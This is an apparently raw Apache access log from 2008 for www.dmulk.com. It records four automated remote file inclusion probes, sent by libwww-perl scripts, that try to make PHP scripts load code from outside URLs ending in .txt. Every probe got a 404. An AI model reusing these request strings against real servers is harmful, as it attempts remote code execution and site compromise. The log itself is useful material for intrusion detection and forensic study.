89.108.66.182 - - [11/Jun/2008:10:34:41 -0700] "GET /logs/access_080429.log//skin/zero_vote/error.php?dir=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.153.109 - - [11/Jun/2008:10:34:54 -0700] "GET /logs/access_080301.log/trans.php?trans=http://www.codinus.com/include/sida6_4.txt?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.153.109 - - [11/Jun/2008:10:34:55 -0700] "GET /trans.php?trans=http://www.codinus.com/include/sida6_4.txt?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.153.109 - - [11/Jun/2008:10:34:55 -0700] "GET /logs/trans.php?trans=http://www.codinus.com/include/sida6_4.txt?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
